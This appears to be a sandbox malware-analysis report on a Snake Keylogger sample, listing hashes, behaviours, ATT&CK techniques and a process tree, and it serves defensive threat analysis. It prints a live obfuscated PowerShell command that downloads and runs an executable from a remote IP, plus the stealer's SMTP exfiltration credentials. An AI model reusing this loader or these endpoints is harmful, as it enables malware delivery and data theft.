snakekeylogger | bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef

Analysis

max time kernel
21s
max time network
116s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06-10-2024 18:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.hta
Size

150KB
MD5

25a0a6e379daa9cb5c68307fbf0857ea
SHA1

4c672a33a46b32584f00868c4b98d10187a91c3c
SHA256

bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef
SHA512

fb0bb7232df274cc07e30ec425e891e40cc105469e2aaf0f0d3843199c605f910a74690195a08ed1b269725ff13a48b927585d0f98a655743b0484ea8f652ee7
SSDEEP

48:7oa+ahWjz7eWLB2L64UKB3Rns4wKB3RnFWhWYYeecSr99DdokZGStBw04v4U1QYx:Ea+Cw7W3FNYfqffZUgAVT

Score

10^/10

snakekeylogger collection defense_evasion discovery execution keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.purityontap.com
Port:
587
Username:
[email protected]
Password:
mail55
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 3 IoCs

resource	yara_rule
behavioral1/memory/2952-29-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2952-31-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2952-30-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2752	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2752	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1060	taskhostw.exe

Loads dropped DLL 1 IoCs

pid	Process
2752	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	checkip.dyndns.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000900000001658c-21.dat	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1060 set thread context of 2952	1060	taskhostw.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2752	powershell.exe
2752	powershell.exe
2752	powershell.exe
2952	RegSvcs.exe
2952	RegSvcs.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1060	taskhostw.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	2952	RegSvcs.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 2804	2656	mshta.exe	30
PID 2656 wrote to memory of 2804	2656	mshta.exe	30
PID 2656 wrote to memory of 2804	2656	mshta.exe	30
PID 2656 wrote to memory of 2804	2656	mshta.exe	30
PID 2804 wrote to memory of 2752	2804	cmd.exe	32
PID 2804 wrote to memory of 2752	2804	cmd.exe	32
PID 2804 wrote to memory of 2752	2804	cmd.exe	32
PID 2804 wrote to memory of 2752	2804	cmd.exe	32
PID 2752 wrote to memory of 2716	2752	powershell.exe	33
PID 2752 wrote to memory of 2716	2752	powershell.exe	33
PID 2752 wrote to memory of 2716	2752	powershell.exe	33
PID 2752 wrote to memory of 2716	2752	powershell.exe	33
PID 2716 wrote to memory of 2432	2716	csc.exe	34
PID 2716 wrote to memory of 2432	2716	csc.exe	34
PID 2716 wrote to memory of 2432	2716	csc.exe	34
PID 2716 wrote to memory of 2432	2716	csc.exe	34
PID 2752 wrote to memory of 1060	2752	powershell.exe	36
PID 2752 wrote to memory of 1060	2752	powershell.exe	36
PID 2752 wrote to memory of 1060	2752	powershell.exe	36
PID 2752 wrote to memory of 1060	2752	powershell.exe	36
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37
PID 1060 wrote to memory of 2952	1060	taskhostw.exe	37

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ehvyhyir.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2716
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B89.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5B88.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2432
  - - C:\Users\Admin\AppData\Roaming\taskhostw.exe
      "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:1060
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5B89.tmp

Filesize
1KB

MD5
ec2c30351133d09683a8d0a405589208

SHA1
aea46cf50c197271e71e44e0654184c4cd6c9f07

SHA256
1409cbb8a730a59ab94c9540316ec85c0d36896a5844aa74870bf8271a01178e

SHA512
3d1f04f1128565bd9871a9e070c2af585e403a325a8d2e87fc3eaa761538e1a42fcea8b39509a937d1bae73e02f42b84d351e6d658a652d46c287e31e494eb45

Download Submit
C:\Users\Admin\AppData\Local\Temp\ehvyhyir.dll

Filesize
3KB

MD5
5dd282324cbc23676298d5944dd20ea0

SHA1
466d92fcb410ba3e2526d171459b570ac18932eb

SHA256
64deae850d8a411796458ea83cbf68b88cd246beb9c91122c9f7392c0c381e81

SHA512
c895419e1912b64901ef6408fb88bca3a629a3dab9cf1e41a778f669cd4364dadd142766497362ae1e1b146fe0144bf51ca22d2cf599ba327cdd566c33622d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\ehvyhyir.pdb

Filesize
7KB

MD5
3965001f3201783b980cbbba193d7782

SHA1
2ae8efe426239eff1b7897ef6da59b01d9631516

SHA256
83c3dad4f1eaf85f670907413ec264dc8bc1d8f26a26e04c4f0b60f71a8dce74

SHA512
7eb08abab08ed0da235fb23b4fbd52ab64094c59e5d2841bfcfd07fd8d3c23d8df8f1f3c3b91b6fd3aaa4bd6bfd24fd7006d44d8df97381d8c8b0ee2e6039393

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostw.exe

Filesize
931KB

MD5
58ff14d476f2bbaab31b12587c09559e

SHA1
ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94

SHA256
1640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364

SHA512
a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5B88.tmp

Filesize
652B

MD5
e902f7a0957d70a3ce9de0d48cd0a7b1

SHA1
a747d80f6d415cbb55116a787b0096d80f603a53

SHA256
104aa0b5a2c4dba2c4b59c55e38897e00ea2f00d042cef648dfed47233be0e35

SHA512
9e503874e360f7fb48abd9d6cb8af3f1936786aecc0b118d9218a7dee1e3672301fbe72b9a9943627c97f5d730442a2bdf6cc57c277e6cd3dec9d859e646316c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ehvyhyir.0.cs

Filesize
477B

MD5
3c2b912e8118e7163d3d05a557f13d2f

SHA1
8889f87c11a2fca2b363c3064d317447a29c5498

SHA256
822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852

SHA512
7aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ehvyhyir.cmdline

Filesize
309B

MD5
d38281c8c3d57f203696713854deeb06

SHA1
d06d9faad8aacc026b2b799506116c8ebb084e4c

SHA256
28dbac537898ced3818d0d3541e7be7f01e031d33b7e351212ec423e2322d488

SHA512
93ae85fe7301c20162e62d11961d0f8ecffc336dfe7ca6d3bae54c78b8a751940f9504b5bef46cf3f86c3a17035adc49915e1787da03f3c29ba032e5c9ce5a73

Download Submit
memory/2952-29-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2952-31-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2952-30-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download